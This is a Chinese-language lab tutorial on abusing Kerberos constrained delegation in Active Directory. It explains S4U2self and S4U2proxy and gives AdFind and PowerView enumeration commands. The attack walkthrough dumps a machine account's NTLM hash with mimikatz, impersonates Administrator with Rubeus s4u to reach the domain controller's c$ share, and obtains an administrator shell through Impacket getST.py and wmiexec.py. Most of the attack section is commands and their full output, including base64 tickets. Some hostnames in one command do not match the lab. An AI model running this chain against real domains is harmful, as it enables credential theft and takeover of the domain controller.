Kerbeeros

Kerbeeros

束性委派攻击

概念：

        Windows Server 2003之后微软引入了非约束委派。同时，为了顺利进行约束性委派，微软于2007年为Kerberos的TGS_REQ和 TGS_REP 阶段引入了两个扩展协议：S4u2self（Service for User to Self）和S4U2proxy（Service for User to Proxy）。

        对于约束性委派，服务账户只能获取该用户对指定服务的ST，从而只能模拟该用户访问特定的服务。配置了约束性委派账户的msDS-AllowedToDelegateTo 属性会指定对哪个SPN进行委派，约束性委派的设置需要SeEnableDelegationPrivilege特权，该特权默认仅授予域管理员和企业管理员。

约束委派有两种：

1. 仅使用Kerberos，不能进行协议转换
2. 使用任何身份验证协议

S4u2self & S4U2proxy

S4U2self协议允许服务代表任意用户请求访问自身服务的ST服务票据

S4U2proxy协议允许服务在已取得ST服务票据下代表任意用户获取另一个服务的服务票据

约束委派限制了S4U2proxy协议的请求范围，使得配置了委派属性的服务只能模拟用户身份访问特丢你个的其他服务。

配置了约束性委派的账户属性会有如下两个变化：

1. 账户userAccountControl属性会被设置为TRUSTED_TO_AUTH_FOR_DELEGATION标志位，值为16781312。
2. 账户msDS-AllowedToDelegateTo属性，添加允许委派的服务。

环境介绍：

• ad01 域控 administrator 10.10.10.100
• dc01 域用户 test 普通用户：User 10.10.10.101

在域控上配置约束性委派

计算机用户的约束性委派配置：控制面板\系统和安全\管理工具\Active Directory 用户和计算机（%SystemRoot%\system32\dsa.msc）---> 域名/Computers/名称/属性 ---> 委派 ---> 仅信任此用户作为指定服务的委派（使用任何身份提供验证协议）--->添加--->cifs ad01.sunday

同样，对test也配置约束委派，

查询方法：

ADFind：

在普通域用户下执行：

# AdFind.exe查询约束委派机器账户
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto# AdFind.exe查询约束委派服务账户
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

PowerView：

# 导入
import-module .\powerview.ps1# PowerView查询约束委派机器账户
Get-NetComputer -TrustedToAuth -domain sunday.club -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|ft -Wrap -AutoSize# PowerView查询约束委派服务账户
Get-DomainUser –TrustedToAuth -domain sunday.club -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl

（1）攻击方法：使用机器账户的Hash值

利用条件：

1. 需要Administrator权限
2. 目标机器账户配置了约束性委派

实践过程：

# 使用mimikatz获取机器账户NTLM Hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc

Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday /dc:ad01.sunday /nowrap

# 使用Rubeus通过S4U2Self协议代表域管理员Administrator请求针对域控LDAP服务的票据，并注入内存
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad2012.sunday.club /dc:DC2016.redteam.lab /ptt /ticket:doIE7DCCBOigAwIBBaEDAgEWooIEBDCCBABhggP8MIID+KADAgEFoQ0bC1JFRFRFQU0uTEFCoiAwHqADAgECoRcwFRsGa3JidGd0GwtyZWR0ZWFtLmxhYqOCA74wggO6oAMCARKhAwIBAqKCA6wEggOoM8VAe67r80K7kucYIn8+7OGwBh7K0P3+J3PvGUYPVlz2+WFR9jNWhQ8SiK0Qwa0uUaZhH6RxZO0GXrW13YcRxuomfopTCDZCq0J5LlAyr+sYq4C+VDR+1n/W8/hMP4rqsdZqfVK7z8jmUhFbB1TGRu7MKuxexQ0Kmr2ae6sH8RmuFEAJHwjS3LXZqtB6AVf3V04fT5PrLatDiLs8DAVHgD18kJwRsF34qjKsC2jsGWeXZkjNsuQFV31HQN0TtAsMR7vftYHag7jYuzmwAvAvKE8fgtoi8Yf6GcFCvKutA65Tc8oSJDG3nd5LdpAuPRPo/SAJn4ujs9SUTjTXWEXNp69uSrdFZ7hR/8yPiZLw1hPoOm3ZlUTGBuUclxep28tDgaA1alBNsH5iAmza1fGj6FUOUoYvRGpC3B4zqs+o2Bd3dNDaHNFcTCc8O6Dcti1q7bhNnLmQZcTq1rTRI0e0mPvPet+xV/obRc2r1qxzjAq5/BhjFu94B+IaolJXoFVoIvz67nSe/h6459xnUPrgqh2PsnwfeakR4CLqcgAbyEOoQV4MWpOJrDgjoBeZ8lfGTY97vIvA0fAuRdqy5L4JX6b+LQxt5fZdCChfMh+YQl1zQs/UYST6UD9xqRvF7l84YGN0lsQYboMHSoZfj4bE2ii1MmrC/18jI/vwZKBjg5aY8MfpTvsSih/IxeVr9YEAOCCsEFFlq7i/UuWP+hiMaGqldqw2eZHwRmobHaJWLmzgErJXYZcRNz84EuLoDdQTWMWpXV8Glr3c+BwPlFOITpwixL8KDKM8PA0kOFok/ci+zlVY/mf3dA6pXmzDKkT0boTczXsOc7zZx4sc34YysY/sSQvqb2sZAvvW1+v1J4N4t8i+/QN1upuk/npqPwDfUhyi7AeO+fcVpCn4ziaNqfebzdh3F3ZmgdrdViTq6I84QACKwzVHH59rjzN81pLuYqGw49B4g3xWYvo1ZA1lJsGGZFa4JwFw3q1fk6Q3qgTGlO0fn/7VFQjtLmJBe6LwtLkTySQsQvZxAHMc8Euc2jZgLGwyR8ViKRo9BmbhYblChJCOrq/14JP2GTHYgMuVx4iSqEVGjnm9/crfWLgbTaSVJ7UChqGzKquer2RuDqNPpcxMPuj9aHfor5ItRhfdnDyni8IQj5zUv4bEBWoRWwyTGk+8UpeGsMbSpEMjoH7q0tw4xyGkTRD/Bz3CWjW/bLtqcB07W2Et9EKTJQh1lzTGNi4GvNhso4HTMIHQoAMCAQCigcgEgcV9gcIwgb+ggbwwgbkwgbagGzAZoAMCARehEgQQRhdvpI6qSFO1Eo5nYZxvZKENGwtSRURURUFNLkxBQqIVMBOgAwIBAaEMMAobCFdJTjEwLTEkowcDBQBA4QAApREYDzIwMjIwNTE4MDkzNTE1WqYRGA8yMDIyMDUxODE5MzUxNVqnERgPMjAyMjA1MjUwOTM1MTVaqA0bC1JFRFRFQU0uTEFCqSAwHqADAgECoRcwFRsGa3JidGd0GwtyZWR0ZWFtLmxhYg==# 直接dir
dir \\ad2012.sunday.club\c$

坑点：当在cmd下使用Rubeus导入票据的时候会出现资源不足，无法导入的情况，可以尝试在powershell下导入。

C:\Windows\system32>cd C:\C:\>Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday /dc:ad01.sunday /nowrap______        _(_____ \      | |_____) )_   _| |__  _____ _   _  ___|  __  /| | | |  _ \| ___ | | | |/___)| |  \ \| |_| | |_) ) ____| |_| |___ ||_|   |_|____/|____/|_____)____/(___/v1.6.4[*] Action: Ask TGT[*] Using rc4_hmac hash: 532e9a018289789294a524f8f6f543cc
[*] Building AS-REQ (w/ preauth) for: 'sunday\dc01$'
[+] TGT request successful!
[*] base64(ticket.kirbi):doIEwDCCBLygAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQwbClNVTkRBWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb22jggOaMIIDlqADAgESoQMCAQKiggOIBIIDhNDqkC1R5wVv3g3s0PiQR969RH7BGNASqsqvjPUrKhSPyliH2V6kLJw6EE0gpm9BQYLkhqQdk04no14APn/+5dBJHTUkhePglUj+/4wpUqYCWub60vBwbPZTjsv1H385JIDH24FnWDEzfhje5WBJMot82zlzU1dHR6Yf19qF7IXkPE545woyT+iyW/+YGhlk+ruFxylIV7PaFkNJxV+RZMnwiZyc+RELDT3qJzblfYHbto9G+OhBtIOJffCHBAUU4ErnxMfXmYcjg5wMbHZOdgSnRL9PGQecWFZXLaw+SuEOPYKuuKlIQnyn+fAsrIsNsoIxxL9YSR0VjTYXMSqOAAgEof12anomanrKxaOal8vAjSxWMHObe4yJCjikce5U0b9hwdTpUeyrIGdLEbRp31/jNRBDYJdD2BSQIw4WsKxfRHgk7y3jJllDQj2x2kLi/ndJ1IyBA10mCrKpLtj60v3bon6bQBziurdOBVAlS3hAKMBDuWR11gnmIrirYqN5BGDlwnNN3+msSi15I/AcuqUpZe28/kVVxgwHd6qUVHh544nfySS/YBDht7saUbKCgDbfn/Qc3mCyDOIWdJe8JDpIyEAiEr/KSt6LXWg8XGqDZMFEZEbYU6DoWtfTTCK9aSWgtiGljRhBiOPa9XgYFPNi6zAF+yPLVhrU9XC/XNmxAOYWonk6vNRaHa9oNaQlMwVMXh4jYxdF1L4l/wxXEet7DSe8KgJpNmGUwzHppAVJuQQO0pTq2q7KHX+SEChT8RwZeDKZgU0ZnupAnH0lbNudb8lh0K4lULRC9shAZn+bXFl5EWgdPVrFdvbrJsk6+DHyBLxXUGdUHItS5ssCi2MuCkgA8jfD8Nrm6xLDQ3mAlLhGxEVJFroX4UwPCNMEIe0YN223fSK3nJoq2MFmgx1YaExZzPUn7OFFupBdQju3vr8TYZM+EvfoRN0deYN9qKqgNfmsHQCOaQf6MQlQk5pVSz40uIzJvhxculH7lMlXNX2s6i7dIgBz41v3CWkRIW7vSkLEqUTl7K5Dnm6W1USgWrDAGTvX2uef9Eui2Zp/8SMcCmyz6QG9iELuxXBzakSDI4FSLSFnJbG/KNX1IEr10fvKvr776dFksbDX+lwIe0Ikg7obNXeWNfLBk4+rfpn3DBhd8im4nkJZd7W9nkO52eoebD77XkBi4lsNWBabHcGJfqOBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEHyWyeFMQ7BdxXQi7EZ9zZuhDBsKU1VOREFZLkNPTaISMBCgAwIBAaEJMAcbBWRjMDEkowcDBQBA4QAApREYDzIwMjMwNjA5MDI1OTU1WqYRGA8yMDIzMDYwOTEyNTk1NVqnERgPMjAyMzA2MTYwMjU5NTVaqAwbClNVTkRBWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb20=ServiceName           :  krbtgt/sundayServiceRealm          :  SUNDAY.COMUserName              :  dc01$UserRealm             :  SUNDAY.COMStartTime             :  2023/6/9 10:59:55EndTime               :  2023/6/9 20:59:55RenewTill             :  2023/6/16 10:59:55Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardableKeyType               :  rc4_hmacBase64(key)           :  fJbJ4UxDsF3FdCLsRn3Nmw==C:\>Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad01.sunday /dc:ad01.sunday /ptt /ticket:doIEwDCCBLygAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQwbClNVTkRBWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb22jggOaMIIDlqADAgESoQMCAQKiggOIBIIDhNDqkC1R5wVv3g3s0PiQR969RH7BGNASqsqvjPUrKhSPyliH2V6kLJw6EE0gpm9BQYLkhqQdk04no14APn/+5dBJHTUkhePglUj+/4wpUqYCWub60vBwbPZTjsv1H385JIDH24FnWDEzfhje5WBJMot82zlzU1dHR6Yf19qF7IXkPE545woyT+iyW/+YGhlk+ruFxylIV7PaFkNJxV+RZMnwiZyc+RELDT3qJzblfYHbto9G+OhBtIOJffCHBAUU4ErnxMfXmYcjg5wMbHZOdgSnRL9PGQecWFZXLaw+SuEOPYKuuKlIQnyn+fAsrIsNsoIxxL9YSR0VjTYXMSqOAAgEof12anomanrKxaOal8vAjSxWMHObe4yJCjikce5U0b9hwdTpUeyrIGdLEbRp31/jNRBDYJdD2BSQIw4WsKxfRHgk7y3jJllDQj2x2kLi/ndJ1IyBA10mCrKpLtj60v3bon6bQBziurdOBVAlS3hAKMBDuWR11gnmIrirYqN5BGDlwnNN3+msSi15I/AcuqUpZe28/kVVxgwHd6qUVHh544nfySS/YBDht7saUbKCgDbfn/Qc3mCyDOIWdJe8JDpIyEAiEr/KSt6LXWg8XGqDZMFEZEbYU6DoWtfTTCK9aSWgtiGljRhBiOPa9XgYFPNi6zAF+yPLVhrU9XC/XNmxAOYWonk6vNRaHa9oNaQlMwVMXh4jYxdF1L4l/wxXEet7DSe8KgJpNmGUwzHppAVJuQQO0pTq2q7KHX+SEChT8RwZeDKZgU0ZnupAnH0lbNudb8lh0K4lULRC9shAZn+bXFl5EWgdPVrFdvbrJsk6+DHyBLxXUGdUHItS5ssCi2MuCkgA8jfD8Nrm6xLDQ3mAlLhGxEVJFroX4UwPCNMEIe0YN223fSK3nJoq2MFmgx1YaExZzPUn7OFFupBdQju3vr8TYZM+EvfoRN0deYN9qKqgNfmsHQCOaQf6MQlQk5pVSz40uIzJvhxculH7lMlXNX2s6i7dIgBz41v3CWkRIW7vSkLEqUTl7K5Dnm6W1USgWrDAGTvX2uef9Eui2Zp/8SMcCmyz6QG9iELuxXBzakSDI4FSLSFnJbG/KNX1IEr10fvKvr776dFksbDX+lwIe0Ikg7obNXeWNfLBk4+rfpn3DBhd8im4nkJZd7W9nkO52eoebD77XkBi4lsNWBabHcGJfqOBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEHyWyeFMQ7BdxXQi7EZ9zZuhDBsKU1VOREFZLkNPTaISMBCgAwIBAaEJMAcbBWRjMDEkowcDBQBA4QAApREYDzIwMjMwNjA5MDI1OTU1WqYRGA8yMDIzMDYwOTEyNTk1NVqnERgPMjAyMzA2MTYwMjU5NTVaqAwbClNVTkRBWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb20=______        _(_____ \      | |_____) )_   _| |__  _____ _   _  ___|  __  /| | | |  _ \| ___ | | | |/___)| |  \ \| |_| | |_) ) ____| |_| |___ ||_|   |_|____/|____/|_____)____/(___/v1.6.4[*] Action: S4U[*] Action: S4U[*] Using domain controller: ad01.sunday (10.10.10.100)
[*] Building S4U2self request for: 'dc01$@SUNDAY.COM'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'dc01$@SUNDAY.COM'
[*] base64(ticket.kirbi):doIFTjCCBUqgAwIBBaEDAgEWooIEYTCCBF1hggRZMIIEVaADAgEFoQwbClNVTkRBWS5DT02iEjAQoAMCAQGhCTAHGwVkYzAxJKOCBCowggQmoAMCARKhAwIBAaKCBBgEggQUh2ZK89GToGVPmq6lu8WgUgf4oFaP16neWfZgcl09r/StcPkkQ/fUGCz3Gg/8aUr83J/9cdfWxdvsykraZyp3pigybMnhxJlZLEyED2JPtJvvS4aN6w4QPLjxbG9pTM/5JVHeVudb+Rjs3Ea4zbiVZMnDJX57Es03ZpJik1Tll4Bb4h7/NteRtZ1ZoziqhKh9WaJywSNlRayXv03gnfH1gRwAbuJCYMExixNsNcXm9mS5KIRYsKN367wrWXqT0E+MifZ7qtOxttZjKyRAQcc09ZViOF5pqdy7MzaHfA9Qpm/3WOLVVgNl4jeEb9jQ23a9L7ELeZdIr52R/0s4BB8TyWLHykTK7xOkxgjGsHreBXb5xzN0KHXFYmK4ByWWEy0Fl2/WrxCyiOUACy2GqW2PT3B+UedFTJqBRu54r1ALfTcps87ZAj+XCl6icVzjedxqRky8fnCQ9wEZrazYljqdf+r7P4F1DNSnFEIlNilYBGHNsE4HmYTna0/JgFReawosxHFvlVlTQoNMKxtUVrPbBph0p1QiVAW/hF1U+cp7utzRad9Q891/8Z+6p3mlvYwdWfc/S20LlTF7Zc2RYYatfpiotHdw9Mj0gPG14ibXoSJA/VkDJCXv08fdRU6VmXbsMAwPXwnRw1HSKL5TiVV6yMwWefZ9750W2VIc7TZ5/Pefq0f3rp2UCAhKD2lZHewlP1oSz8M7iPx/YQh9R7AoEC5+lr1BiACHsB20sVjumIwiNdXFvcfFwMJ+zJWKAD3DIyaL+zj5hJTNE4wEMSewd2gDZMEH+ipQWHqTPlomo7clyayISeUkpH4lbDKQvptK4t7pZ/yQe0+qAWwZB/8uQCWaFL6k7LWhLsc5KBij7OF/RV4xPynYJlNUIxlIyYLCKM8SkBmsnwjBCnO6rhowDBSzdVY9QOW3YO7soxXxO76lM7O5uDqmegWipp1awIzSLi0xLPX6SU/yjv85IqA2FfSByD1BiBL/qtfzerRKwFVtCy00gT99/1QF3OUxev4JSNCPUtz2lakuDKL8vOdK+vdFPWpIpBKmouV1hlFGVqDzqmzrnYw4397Iav0HkUW1+3Ya7Wi/tcGNUCnrrDywLoAEjrIr8C7oF3jlGsZlkxfXkUp75gVg061MjJXs7vVY3wcCDsOv8u37NVhwGeSy3wmWqvqiPynwYTv2Vqm4GE6bqPqiYXCnxZfzUn3rHo2sePu+dOGanjBNg9B+TvPbILwIJLLkwC1/mDFPq9E20rYIqp2yb6vH4YdDVYOL0iRNhYBjGQq47sgsrxlKOLdtIlghAeG9Hvvw2zVDttj59igSBCG+qq+kAsfZ9dg5L8q/u3u/3Bds0hNNLIdEeNoVra9853msukLOBXyBnfRqplVX2Fyso4HYMIHVoAMCAQCigc0Egcp9gccwgcSggcEwgb4wgbugKzApoAMCARKhIgQgrfJnKAiBSg8tgX6hMyp/ml3vaIkoI5s7tv+ocnl4SnWhDBsKU1VOREFZLkNPTaIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyMzA2MDkwMzAyMjNaphEYDzIwMjMwNjA5MTI1OTU1WqcRGA8yMDIzMDYxNjAyNTk1NVqoDBsKU1VOREFZLkNPTakSMBCgAwIBAaEJMAcbBWRjMDEk[*] Impersonating user 'Administrator' to target SPN 'CIFS/ad01.sunday'
[*] Using domain controller: ad01.sunday (10.10.10.100)
[*] Building S4U2proxy request for service: 'CIFS/ad01.sunday'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/ad01.sunday':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
[+] Ticket successfully imported!C:\> dir \\ad01.sunday\c$驱动器 \\ad01.sunday\c$ 中的卷没有标签。卷的序列号是 961F-20FE\\ad01.sunday\c$ 的目录2013/08/22  23:52    <DIR>          PerfLogs
2023/06/07  14:14    <DIR>          Program Files
2013/08/22  23:39    <DIR>          Program Files (x86)
2023/06/07  09:53    <DIR>          Users
2023/06/07  15:08    <DIR>          Windows0 个文件              0 字节5 个目录 93,420,552,192 可用字节

（2）攻击方法：使用机器账户的Hash值 （getST)

这里使用Impacket工具套件中的getST.py脚本请求服务票据，并利用该脚本通过wmiexec.py工具远程登录。

利用条件：

1. 需要Administrator权限
2. 目标机器账户配置了约束性委派

实践过程：

# mimikatz获取机器账户NTLM Hash值
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc# 使用getST申请服务票据
python getST.py -dc-ip 10.10.10.100 -spn CIFS/ad01.sunday -impersonate administrator sunday/dc01$ -hashes :532e9a018289789294a524f8f6f543cc# 使用票据远程访问
set KRB5CCNAME=administratorache # 用wmiexec弹出一个权限为administrator交互式的shell
python3 wmiexec.py -k sunday/administrator@ad01.sunday -no-pass -dc-ip 10.10.10.100